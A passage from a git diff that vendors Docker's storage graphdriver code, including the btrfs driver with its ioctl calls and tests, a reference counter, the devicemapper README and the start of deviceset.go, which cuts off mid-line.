+ +// MsRemount declared to specify a non-linux system mount. +const MsRemount = 0 + +func mount(source string, target string, fstype string, flags uintptr, data string) (err error) { + return errors.New("mount is not implemented on this platform") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go new file mode 100644 index 0000000000..44420f11a7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go @@ -0,0 +1,530 @@ +// +build linux + +package btrfs + +/* +#include +#include +#include +#include + +static void set_name_btrfs_ioctl_vol_args_v2(struct btrfs_ioctl_vol_args_v2* btrfs_struct, const char* value) { + snprintf(btrfs_struct->name, BTRFS_SUBVOL_NAME_MAX, "%s", value); +} +*/ +import "C" + +import ( + "fmt" + "os" + "path" + "path/filepath" + "strings" + "syscall" + "unsafe" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/go-units" + "github.com/opencontainers/runc/libcontainer/label" +) + +func init() { + graphdriver.Register("btrfs", Init) +} + +var ( + quotaEnabled = false + userDiskQuota = false +) + +type btrfsOptions struct { + minSpace uint64 + size uint64 +} + +// Init returns a new BTRFS driver. +// An error is returned if BTRFS is not supported. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + + fsMagic, err := graphdriver.GetFSMagic(home) + if err != nil { + return nil, err + } + + if fsMagic != graphdriver.FsMagicBtrfs { + return nil, graphdriver.ErrPrerequisites + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + opt, err := parseOptions(options) + if err != nil { + return nil, err + } + + if userDiskQuota { + if err := subvolEnableQuota(home); err != nil { + return nil, err + } + quotaEnabled = true + } + + driver := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + options: opt, + } + + return graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), nil +} + +func parseOptions(opt []string) (btrfsOptions, error) { + var options btrfsOptions + for _, option := range opt { + key, val, err := parsers.ParseKeyValueOpt(option) + if err != nil { + return options, err + } + key = strings.ToLower(key) + switch key { + case "btrfs.min_space": + minSpace, err := units.RAMInBytes(val) + if err != nil { + return options, err + } + userDiskQuota = true + options.minSpace = uint64(minSpace) + default: + return options, fmt.Errorf("Unknown option %s", key) + } + } + return options, nil +} + +// Driver contains information about the filesystem mounted. +type Driver struct { + //root of the file system + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + options btrfsOptions +} + +// String prints the name of the driver (btrfs). +func (d *Driver) String() string { + return "btrfs" +} + +// Status returns current driver information in a two dimensional string array. +// Output contains "Build Version" and "Library Version" of the btrfs libraries used. +// Version information can be used to check compatibility with your kernel. +func (d *Driver) Status() [][2]string { + status := [][2]string{} + if bv := btrfsBuildVersion(); bv != "-" { + status = append(status, [2]string{"Build Version", bv}) + } + if lv := btrfsLibVersion(); lv != -1 { + status = append(status, [2]string{"Library Version", fmt.Sprintf("%d", lv)}) + } + return status +} + +// GetMetadata returns empty metadata for this driver. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + return nil, nil +} + +// Cleanup unmounts the home directory. +func (d *Driver) Cleanup() error { + if quotaEnabled { + if err := subvolDisableQuota(d.home); err != nil { + return err + } + } + + return mount.Unmount(d.home) +} + +func free(p *C.char) { + C.free(unsafe.Pointer(p)) +} + +func openDir(path string) (*C.DIR, error) { + Cpath := C.CString(path) + defer free(Cpath) + + dir := C.opendir(Cpath) + if dir == nil { + return nil, fmt.Errorf("Can't open dir") + } + return dir, nil +} + +func closeDir(dir *C.DIR) { + if dir != nil { + C.closedir(dir) + } +} + +func getDirFd(dir *C.DIR) uintptr { + return uintptr(C.dirfd(dir)) +} + +func subvolCreate(path, name string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_vol_args + for i, c := range []byte(name) { + args.name[i] = C.char(c) + } + + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SUBVOL_CREATE, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to create btrfs subvolume: %v", errno.Error()) + } + return nil +} + +func subvolSnapshot(src, dest, name string) error { + srcDir, err := openDir(src) + if err != nil { + return err + } + defer closeDir(srcDir) + + destDir, err := openDir(dest) + if err != nil { + return err + } + defer closeDir(destDir) + + var args C.struct_btrfs_ioctl_vol_args_v2 + args.fd = C.__s64(getDirFd(srcDir)) + + var cs = C.CString(name) + C.set_name_btrfs_ioctl_vol_args_v2(&args, cs) + C.free(unsafe.Pointer(cs)) + + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(destDir), C.BTRFS_IOC_SNAP_CREATE_V2, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to create btrfs snapshot: %v", errno.Error()) + } + return nil +} + +func isSubvolume(p string) (bool, error) { + var bufStat syscall.Stat_t + if err := syscall.Lstat(p, &bufStat); err != nil { + return false, err + } + + // return true if it is a btrfs subvolume + return bufStat.Ino == C.BTRFS_FIRST_FREE_OBJECTID, nil +} + +func subvolDelete(dirpath, name string) error { + dir, err := openDir(dirpath) + if err != nil { + return err + } + defer closeDir(dir) + fullPath := path.Join(dirpath, name) + + var args C.struct_btrfs_ioctl_vol_args + + // walk the btrfs subvolumes + walkSubvolumes := func(p string, f os.FileInfo, err error) error { + if err != nil { + if os.IsNotExist(err) && p != fullPath { + // missing most likely because the path was a subvolume that got removed in the previous iteration + // since it's gone anyway, we don't care + return nil + } + return fmt.Errorf("error walking subvolumes: %v", err) + } + // we want to check children only so skip itself + // it will be removed after the filepath walk anyways + if f.IsDir() && p != fullPath { + sv, err := isSubvolume(p) + if err != nil { + return fmt.Errorf("Failed to test if %s is a btrfs subvolume: %v", p, err) + } + if sv { + if err := subvolDelete(path.Dir(p), f.Name()); err != nil { + return fmt.Errorf("Failed to destroy btrfs child subvolume (%s) of parent (%s): %v", p, dirpath, err) + } + } + } + return nil + } + if err := filepath.Walk(path.Join(dirpath, name), walkSubvolumes); err != nil { + return fmt.Errorf("Recursively walking subvolumes for %s failed: %v", dirpath, err) + } + + // all subvolumes have been removed + // now remove the one originally passed in + for i, c := range []byte(name) { + args.name[i] = C.char(c) + } + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_SNAP_DESTROY, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to destroy btrfs snapshot %s for %s: %v", dirpath, name, errno.Error()) + } + return nil +} + +func subvolEnableQuota(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_quota_ctl_args + args.cmd = C.BTRFS_QUOTA_CTL_ENABLE + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to enable btrfs quota for %s: %v", dir, errno.Error()) + } + + return nil +} + +func subvolDisableQuota(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_quota_ctl_args + args.cmd = C.BTRFS_QUOTA_CTL_DISABLE + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_CTL, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to disable btrfs quota for %s: %v", dir, errno.Error()) + } + + return nil +} + +func subvolRescanQuota(path string) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_quota_rescan_args + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QUOTA_RESCAN_WAIT, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to rescan btrfs quota for %s: %v", dir, errno.Error()) + } + + return nil +} + +func subvolLimitQgroup(path string, size uint64) error { + dir, err := openDir(path) + if err != nil { + return err + } + defer closeDir(dir) + + var args C.struct_btrfs_ioctl_qgroup_limit_args + args.lim.max_referenced = C.__u64(size) + args.lim.flags = C.BTRFS_QGROUP_LIMIT_MAX_RFER + _, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.BTRFS_IOC_QGROUP_LIMIT, + uintptr(unsafe.Pointer(&args))) + if errno != 0 { + return fmt.Errorf("Failed to limit qgroup for %s: %v", dir, errno.Error()) + } + + return nil +} + +func (d *Driver) subvolumesDir() string { + return path.Join(d.home, "subvolumes") +} + +func (d *Driver) subvolumesDirID(id string) string { + return path.Join(d.subvolumesDir(), id) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create the filesystem with given id. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error { + subvolumes := path.Join(d.home, "subvolumes") + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(subvolumes, 0700, rootUID, rootGID); err != nil { + return err + } + if parent == "" { + if err := subvolCreate(subvolumes, id); err != nil { + return err + } + } else { + parentDir := d.subvolumesDirID(parent) + st, err := os.Stat(parentDir) + if err != nil { + return err + } + if !st.IsDir() { + return fmt.Errorf("%s: not a directory", parentDir) + } + if err := subvolSnapshot(parentDir, subvolumes, id); err != nil { + return err + } + } + + var storageOpt map[string]string + if opts != nil { + storageOpt = opts.StorageOpt + } + + if _, ok := storageOpt["size"]; ok { + driver := &Driver{} + if err := d.parseStorageOpt(storageOpt, driver); err != nil { + return err + } + if err := d.setStorageSize(path.Join(subvolumes, id), driver); err != nil { + return err + } + } + + // if we have a remapped root (user namespaces enabled), change the created snapshot + // dir ownership to match + if rootUID != 0 || rootGID != 0 { + if err := os.Chown(path.Join(subvolumes, id), rootUID, rootGID); err != nil { + return err + } + } + + mountLabel := "" + if opts != nil { + mountLabel = opts.MountLabel + } + + return label.Relabel(path.Join(subvolumes, id), mountLabel, false) +} + +// Parse btrfs storage options +func (d *Driver) parseStorageOpt(storageOpt map[string]string, driver *Driver) error { + // Read size to change the subvolume disk quota per container + for key, val := range storageOpt { + key := strings.ToLower(key) + switch key { + case "size": + size, err := units.RAMInBytes(val) + if err != nil { + return err + } + driver.options.size = uint64(size) + default: + return fmt.Errorf("Unknown option %s", key) + } + } + + return nil +} + +// Set btrfs storage size +func (d *Driver) setStorageSize(dir string, driver *Driver) error { + if driver.options.size <= 0 { + return fmt.Errorf("btrfs: invalid storage size: %s", units.HumanSize(float64(driver.options.size))) + } + if d.options.minSpace > 0 && driver.options.size < d.options.minSpace { + return fmt.Errorf("btrfs: storage size cannot be less than %s", units.HumanSize(float64(d.options.minSpace))) + } + + if !quotaEnabled { + if err := subvolEnableQuota(d.home); err != nil { + return err + } + quotaEnabled = true + } + + if err := subvolLimitQgroup(dir, driver.options.size); err != nil { + return err + } + + return nil +} + +// Remove the filesystem with given id. +func (d *Driver) Remove(id string) error { + dir := d.subvolumesDirID(id) + if _, err := os.Stat(dir); err != nil { + return err + } + if err := subvolDelete(d.subvolumesDir(), id); err != nil { + return err + } + if err := os.RemoveAll(dir); err != nil && !os.IsNotExist(err) { + return err + } + if err := subvolRescanQuota(d.home); err != nil { + return err + } + return nil +} + +// Get the requested filesystem id. +func (d *Driver) Get(id, mountLabel string) (string, error) { + dir := d.subvolumesDirID(id) + st, err := os.Stat(dir) + if err != nil { + return "", err + } + + if !st.IsDir() { + return "", fmt.Errorf("%s: not a directory", dir) + } + + return dir, nil +} + +// Put is not implemented for BTRFS as there is no cleanup required for the id. +func (d *Driver) Put(id string) error { + // Get() creates no runtime resources (like e.g. mounts) + // so this doesn't need to do anything. + return nil +} + +// Exists checks if the id exists in the filesystem. +func (d *Driver) Exists(id string) bool { + dir := d.subvolumesDirID(id) + _, err := os.Stat(dir) + return err == nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go new file mode 100644 index 0000000000..0038dbcdcd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go @@ -0,0 +1,63 @@ +// +build linux + +package btrfs + +import ( + "os" + "path" + "testing" + + "github.com/docker/docker/daemon/graphdriver/graphtest" +) + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestBtrfsSetup and TestBtrfsTeardown +func TestBtrfsSetup(t *testing.T) { + graphtest.GetDriver(t, "btrfs") +} + +func TestBtrfsCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "btrfs") +} + +func TestBtrfsCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "btrfs") +} + +func TestBtrfsCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "btrfs") +} + +func TestBtrfsSubvolDelete(t *testing.T) { + d := graphtest.GetDriver(t, "btrfs") + if err := d.CreateReadWrite("test", "", nil); err != nil { + t.Fatal(err) + } + defer graphtest.PutDriver(t) + + dir, err := d.Get("test", "") + if err != nil { + t.Fatal(err) + } + defer d.Put("test") + + if err := subvolCreate(dir, "subvoltest"); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(path.Join(dir, "subvoltest")); err != nil { + t.Fatal(err) + } + + if err := d.Remove("test"); err != nil { + t.Fatal(err) + } + + if _, err := os.Stat(path.Join(dir, "subvoltest")); !os.IsNotExist(err) { + t.Fatalf("expected not exist error on nested subvol, got: %v", err) + } +} + +func TestBtrfsTeardown(t *testing.T) { + graphtest.PutDriver(t) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go new file mode 100644 index 0000000000..f07088887a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux !cgo + +package btrfs diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go new file mode 100644 index 0000000000..73d90cdd71 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go @@ -0,0 +1,26 @@ +// +build linux,!btrfs_noversion + +package btrfs + +/* +#include + +// around version 3.16, they did not define lib version yet +#ifndef BTRFS_LIB_VERSION +#define BTRFS_LIB_VERSION -1 +#endif + +// upstream had removed it, but now it will be coming back +#ifndef BTRFS_BUILD_VERSION +#define BTRFS_BUILD_VERSION "-" +#endif +*/ +import "C" + +func btrfsBuildVersion() string { + return string(C.BTRFS_BUILD_VERSION) +} + +func btrfsLibVersion() int { + return int(C.BTRFS_LIB_VERSION) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go new file mode 100644 index 0000000000..f802fbc629 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go @@ -0,0 +1,14 @@ +// +build linux,btrfs_noversion + +package btrfs + +// TODO(vbatts) remove this work-around once supported linux distros are on +// btrfs utilities of >= 3.16.1 + +func btrfsBuildVersion() string { + return "-" +} + +func btrfsLibVersion() int { + return -1 +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go new file mode 100644 index 0000000000..15a6e75cb3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go @@ -0,0 +1,13 @@ +// +build linux,!btrfs_noversion + +package btrfs + +import ( + "testing" +) + +func TestLibVersion(t *testing.T) { + if btrfsLibVersion() <= 0 { + t.Errorf("expected output from btrfs lib version > 0") + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/counter.go b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go new file mode 100644 index 0000000000..5ea604f5b6 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/counter.go @@ -0,0 +1,67 @@ +package graphdriver + +import "sync" + +type minfo struct { + check bool + count int +} + +// RefCounter is a generic counter for use by graphdriver Get/Put calls +type RefCounter struct { + counts map[string]*minfo + mu sync.Mutex + checker Checker +} + +// NewRefCounter returns a new RefCounter +func NewRefCounter(c Checker) *RefCounter { + return &RefCounter{ + checker: c, + counts: make(map[string]*minfo), + } +} + +// Increment increaes the ref count for the given id and returns the current count +func (c *RefCounter) Increment(path string) int { + c.mu.Lock() + m := c.counts[path] + if m == nil { + m = &minfo{} + c.counts[path] = m + } + // if we are checking this path for the first time check to make sure + // if it was already mounted on the system and make sure we have a correct ref + // count if it is mounted as it is in use. + if !m.check { + m.check = true + if c.checker.IsMounted(path) { + m.count++ + } + } + m.count++ + c.mu.Unlock() + return m.count +} + +// Decrement decreases the ref count for the given id and returns the current count +func (c *RefCounter) Decrement(path string) int { + c.mu.Lock() + m := c.counts[path] + if m == nil { + m = &minfo{} + c.counts[path] = m + } + // if we are checking this path for the first time check to make sure + // if it was already mounted on the system and make sure we have a correct ref + // count if it is mounted as it is in use. + if !m.check { + m.check = true + if c.checker.IsMounted(path) { + m.count++ + } + } + m.count-- + c.mu.Unlock() + return m.count +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md new file mode 100644 index 0000000000..b23bbb107a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md @@ -0,0 +1,96 @@ +## devicemapper - a storage backend based on Device Mapper + +### Theory of operation + +The device mapper graphdriver uses the device mapper thin provisioning +module (dm-thinp) to implement CoW snapshots. The preferred model is +to have a thin pool reserved outside of Docker and passed to the +daemon via the `--storage-opt dm.thinpooldev` option. + +As a fallback if no thin pool is provided, loopback files will be +created. Loopback is very slow, but can be used without any +pre-configuration of storage. It is strongly recommended that you do +not use loopback in production. Ensure your Docker daemon has a +`--storage-opt dm.thinpooldev` argument provided. + +In loopback, a thin pool is created at `/var/lib/docker/devicemapper` +(devicemapper graph location) based on two block devices, one for +data and one for metadata. By default these block devices are created +automatically by using loopback mounts of automatically created sparse +files. + +The default loopback files used are +`/var/lib/docker/devicemapper/devicemapper/data` and +`/var/lib/docker/devicemapper/devicemapper/metadata`. Additional metadata +required to map from docker entities to the corresponding devicemapper +volumes is stored in the `/var/lib/docker/devicemapper/devicemapper/json` +file (encoded as Json). + +In order to support multiple devicemapper graphs on a system, the thin +pool will be named something like: `docker-0:33-19478248-pool`, where +the `0:33` part is the minor/major device nr and `19478248` is the +inode number of the `/var/lib/docker/devicemapper` directory. + +On the thin pool, docker automatically creates a base thin device, +called something like `docker-0:33-19478248-base` of a fixed +size. This is automatically formatted with an empty filesystem on +creation. This device is the base of all docker images and +containers. All base images are snapshots of this device and those +images are then in turn used as snapshots for other images and +eventually containers. + +### Information on `docker info` + +As of docker-1.4.1, `docker info` when using the `devicemapper` storage driver +will display something like: + + $ sudo docker info + [...] + Storage Driver: devicemapper + Pool Name: docker-253:1-17538953-pool + Pool Blocksize: 65.54 kB + Base Device Size: 107.4 GB + Data file: /dev/loop4 + Metadata file: /dev/loop4 + Data Space Used: 2.536 GB + Data Space Total: 107.4 GB + Data Space Available: 104.8 GB + Metadata Space Used: 7.93 MB + Metadata Space Total: 2.147 GB + Metadata Space Available: 2.14 GB + Udev Sync Supported: true + Data loop file: /home/docker/devicemapper/devicemapper/data + Metadata loop file: /home/docker/devicemapper/devicemapper/metadata + Library Version: 1.02.82-git (2013-10-04) + [...] + +#### status items + +Each item in the indented section under `Storage Driver: devicemapper` are +status information about the driver. + * `Pool Name` name of the devicemapper pool for this driver. + * `Pool Blocksize` tells the blocksize the thin pool was initialized with. This only changes on creation. + * `Base Device Size` tells the maximum size of a container and image + * `Data file` blockdevice file used for the devicemapper data + * `Metadata file` blockdevice file used for the devicemapper metadata + * `Data Space Used` tells how much of `Data file` is currently used + * `Data Space Total` tells max size the `Data file` + * `Data Space Available` tells how much free space there is in the `Data file`. If you are using a loop device this will report the actual space available to the loop device on the underlying filesystem. + * `Metadata Space Used` tells how much of `Metadata file` is currently used + * `Metadata Space Total` tells max size the `Metadata file` + * `Metadata Space Available` tells how much free space there is in the `Metadata file`. If you are using a loop device this will report the actual space available to the loop device on the underlying filesystem. + * `Udev Sync Supported` tells whether devicemapper is able to sync with Udev. Should be `true`. + * `Data loop file` file attached to `Data file`, if loopback device is used + * `Metadata loop file` file attached to `Metadata file`, if loopback device is used + * `Library Version` from the libdevmapper used + +### About the devicemapper options + +The devicemapper backend supports some options that you can specify +when starting the docker daemon using the `--storage-opt` flags. +This uses the `dm` prefix and would be used something like `docker daemon --storage-opt dm.foo=bar`. + +These options are currently documented both in [the man +page](../../../man/docker.1.md) and in [the online +documentation](https://docs.docker.com/engine/reference/commandline/dockerd/#/storage-driver-options). +If you add an options, update both the `man` page and the documentation. diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go new file mode 100644 index 0000000000..b8e762592c --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go @@ -0,0 +1,2727 @@ +// +build linux + +package devmapper + +import ( + "bufio" + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/devicemapper" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/loopback" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/go-units" + + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + defaultDataLoopbackSize int64 = 100 * 1024 * 1024 * 1024 + defaultMetaDataLoopbackSize int64 = 2 * 1024 * 1024 * 1024 + defaultBaseFsSize uint64 = 10 * 1024 * 1024 * 1024 + defaultThinpBlockSize uint32 = 128 // 64K = 128 512b sectors + defaultUdevSyncOverride = false + maxDeviceID = 0xffffff // 24 bit, pool limit + deviceIDMapSz = (maxDeviceID + 1) / 8 + // We retry device removal so many a times that even error messages + // will fill up console during normal operation. So only log Fatal + // messages by default. + logLevel = devicemapper.LogLevelFatal + driverDeferredRemovalSupport = false + enableDeferredRemoval = false + enableDeferredDeletion = false + userBaseSize = false + defaultMinFreeSpacePercent uint32 = 10 +) + +const deviceSetMetaFile string = "deviceset-metadata" +const transactionMetaFile string = "transaction-metadata" + +type transaction struct { + OpenTransactionID uint64 `json:"open_transaction_id"` + DeviceIDHash string `json:"device_hash"` + DeviceID int `json:"device_id"` +} + +type devInfo struct { + Hash string `json:"-"` + DeviceID int `json:"device_id"` + Size uint64 `json:"size"` + TransactionID uint64 `json:"transaction_id"` + Initialized bool `json:"initialized"` + Deleted bool `json:"deleted"` + devices *DeviceSet + + // The global DeviceSet lock guarantees that we serialize all + // the calls to libdevmapper (which is not threadsafe), but we + // sometimes release that lock while sleeping. In that case + // this per-device lock is still held, protecting against + // other accesses to the device that we're doing the wait on. + // + // WARNING: In order to avoid AB-BA deadlocks when releasing + // the global lock while holding the per-device locks all + // device locks must be acquired *before* the device lock, and + // multiple device locks should be acquired parent before child. + lock sync.Mutex +} + +type metaData struct { + Devices map[string]*devInfo `json:"Devices"` +} + +// DeviceSet holds information about list of devices +type DeviceSet struct { + metaData `json:"-"` + sync.Mutex `json:"-"` // Protects all fields of DeviceSet and serializes calls into libdevmapper + root string + devicePrefix string + TransactionID uint64 `json:"-"` + NextDeviceID int `json:"next_device_id"` + deviceIDMap []byte + + // Options + dataLoopbackSize int64 + metaDataLoopbackSize int64 + baseFsSize uint64 + filesystem string + mountOptions string + mkfsArgs []string + dataDevice string // block or loop dev + dataLoopFile string // loopback file, if used + metadataDevice string // block or loop dev + metadataLoopFile string // loopback file, if used + doBlkDiscard bool + thinpBlockSize uint32 + thinPoolDevice string + transaction `json:"-"` + overrideUdevSyncCheck bool + deferredRemove bool // use deferred removal + deferredDelete bool // use deferred deletion + BaseDeviceUUID string // save UUID of base device + BaseDeviceFilesystem string // save filesystem of base device + nrDeletedDevices uint // number of deleted devices + deletionWorkerTicker *time.Ticker + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + minFreeSpacePercent uint32 //min free space percentage in thinpool + xfsNospaceRetries string // max retries when xfs receives ENOSPC +} + +// DiskUsage contains information about disk usage and is used when reporting Status of a device. +type DiskUsage struct { + // Used bytes on the disk. + Used uint64 + // Total bytes on the disk. + Total uint64 + // Available bytes on the disk. + Available uint64 +} + +// Status returns the information about the device. +type Status struct { + // PoolName is the name of the data pool. + PoolName string + // DataFile is the actual block device for data. + DataFile string + // DataLoopback loopback file, if used. + DataLoopback string + // MetadataFile is the actual block device for metadata. + MetadataFile string + // MetadataLoopback is the loopback file, if used. + MetadataLoopback string + // Data is the disk used for data. + Data DiskUsage + // Metadata is the disk used for meta data. + Metadata DiskUsage + // BaseDeviceSize is base size of container and image + BaseDeviceSize uint64 + // BaseDeviceFS is backing filesystem. + BaseDeviceFS string + // SectorSize size of the vector. + SectorSize uint64 + // UdevSyncSupported is true if sync is supported. + UdevSyncSupported bool + // DeferredRemoveEnabled is true then the device is not unmounted. + DeferredRemoveEnabled bool + // True if deferred deletion is enabled. This is different from + // deferred removal. "removal" means that device mapper device is + // deactivated. Thin device is still in thin pool and can be activated + // again. But "deletion" means that thin device will be deleted from + // thin pool and it can't be activated again. + DeferredDeleteEnabled bool + DeferredDeletedDeviceCount uint + MinFreeSpace uint64 +} + +// Structure used to export image/container metadata in docker inspect. +type deviceMetadata struct { + deviceID int + deviceSize uint64 // size in bytes + deviceName string // Device name as used during activation +} + +// DevStatus returns information about device mounted containing its id, size and sector information. +type DevStatus struct { + // DeviceID is the id of the device. + DeviceID int + // Size is the size of the filesystem. + Size uint64 + // TransactionID is a unique integer per device set used to identify an operation on the file system, this number is incremental. + TransactionID uint64 + // SizeInSectors indicates the size of the sectors allocated. + SizeInSectors uint64 + // MappedSectors indicates number of mapped sectors. + MappedSectors uint64 + // HighestMappedSector is the pointer to the highest mapped sector. + HighestMappedSector uint64 +} + +func getDevName(name string) string { + return "/dev/mapper/" + name +} + +func (info *devInfo) Name() string { + hash := info.Hash + if hash == "" { + hash = "base" + } + return fmt.Sprintf("%s-%s", info.devices.devicePrefix, hash) +} + +func (info *devInfo) DevName() string { + return getDevName(info.Name()) +} + +func (devices *DeviceSet) loopbackDir() string { + return path.Join(devices.root, "devicemapper") +} + +func (devices *DeviceSet) metadataDir() string { + return path.Join(devices.root, "metadata") +} + +func (devices *DeviceSet) metadataFile(info *devInfo) string { + file := info.Hash + if file == "" { + file = "base" + } + return path.Join(devices.metadataDir(), file) +} + +func (devices *DeviceSet) transactionMetaFile() string { + return path.Join(devices.metadataDir(), transactionMetaFile) +} + +func (devices *DeviceSet) deviceSetMetaFile() string { + return path.Join(devices.metadataDir(), deviceSetMetaFile) +} + +func (devices *DeviceSet) oldMetadataFile() string { + return path.Join(devices.loopbackDir(), "json") +} + +func (devices *DeviceSet) getPoolName() string { + if devices.thinPoolDevice == "" { + return devices.devicePrefix + "-pool" + } + return devices.thinPoolDevice +} + +func (devices *DeviceSet) getPoolDevName() string { + return getDevName(devices.getPoolName()) +} + +func (devices *DeviceSet) hasImage(name string) bool { + dirname := devices.loopbackDir() + filename := path.Join(dirname, name) + + _, err := os.Stat(filename) + return err == nil +} + +// ensureImage creates a sparse file of bytes at the path +// /devicemapper/. +// If the file already exists and new size is larger than its current size, it grows to the new size. +// Either way it returns the full path. +func (devices *DeviceSet) ensureImage(name string, size int64) (string, error) { + dirname := devices.loopbackDir() + filename := path.Join(dirname, name) + + uid, gid, err := idtools.GetRootUIDGID(devices.uidMaps, devices.gidMaps) + if err != nil { + return "", err + } + if err := idtools.MkdirAllAs(dirname, 0700, uid, gid); err != nil && !os.IsExist(err) { + return "", err + } + + if fi, err := os.Stat(filename); err != nil { + if !os.IsNotExist(err) { + return "", err + } + logrus.Debugf("devmapper: Creating loopback file %s for device-manage use", filename) + file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600) + if err != nil { + return "", err + } + defer file.Close() + + if err := file.Truncate(size); err != nil { + return "", err + } + } else { + if fi.Size() < size { + file, err := os.OpenFile(filename, os.O_RDWR|os.O_CREATE, 0600) + if err != nil { + return "", err + } + defer file.Close() + if err := file.Truncate(size); err != nil { + return "", fmt.Errorf("devmapper: Unable to grow loopback file %s: %v", filename, err) + } + } else if fi.Size() > size { + logrus.Warnf("devmapper: Can't shrink loopback file %s", filename) + } + } + return filename, nil +} + +func (devices *DeviceSet) allocateTransactionID() uint64 { + devices.OpenTransactionID = devices.TransactionID + 1 + return devices.OpenTransactionID +} + +func (devices *DeviceSet) updatePoolTransactionID() error { + if err := devicemapper.SetTransactionID(devices.getPoolDevName(), devices.TransactionID, devices.OpenTransactionID); err != nil { + return fmt.Errorf("devmapper: Error setting devmapper 